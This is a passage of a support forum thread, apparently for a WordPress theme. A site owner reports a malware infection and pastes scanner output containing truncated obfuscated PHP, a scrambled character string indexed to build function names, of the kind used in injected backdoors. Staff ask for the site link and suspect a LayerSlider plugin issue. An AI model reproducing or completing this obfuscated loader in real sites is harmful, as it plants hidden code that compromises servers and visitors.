    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[.*] = $.*[.*]…. -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[‘.*’]($.*, $GL… -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[‘.*’]($.*, $GL… -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18
    1 -> $GLOBALS[‘.*’]($.*, $GL… -> \<\?php\$p18=”\>\~Uoq\<x.\#eJ=HI7pZ0Y3nK@OMr\{\[R\`T\&/GyPXtc1wEn+\’\}\*vL:2arBkm%s9-_\]”Ad\\Ch\;6\?4gV5Dzt,iu8Q\$WNjb\)\|f\(S!Fl\”\;\$GLOBALS\[‘ianqd99’\]=\$p18\[81\].\$p18\[20\].\$p18\[81\].\$p18\[62\].\$p18\[59\].\$p18\[9\].\$p18\[79\]\;\$GLOBALS\[‘tetna69’\]=\$p18\[9\].\$p18\[25\].\$p18\[25\].\$p18\[3\].\$p18\[25\].\$p18\[62\].\$p18\[25\].\$p18\[9\].\$p18

    70% abgeschlossen.
    `

    Ich hoffe ihr könnt mir weiterhelfen. Außer löschen und neu installieren fällt mir nicht viel ein.

    Beste Grüße

    Flo

    #546441

    Hi!

    Can you please post the link to your website?
    Please make sure that you are using the latest version 3.4.4 (labeled as 3.4.3) – kriesi.at/documentation/enfold/updating-your-theme-files/

    Best regards,
    Yigit

    #546451

    hi,

    we use the latest version, fresh updated. The link is: http://www.reifen-ritter.de, but its actually shot down by the hoster because of the malware-issues.

    thx :)

    #546454

    Hey!

    It seems to be LayerSlider related. I will pass it to our devs. Please kindly wait to hear from us.

    Cheers!
    Yigit

Viewing 4 posts - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.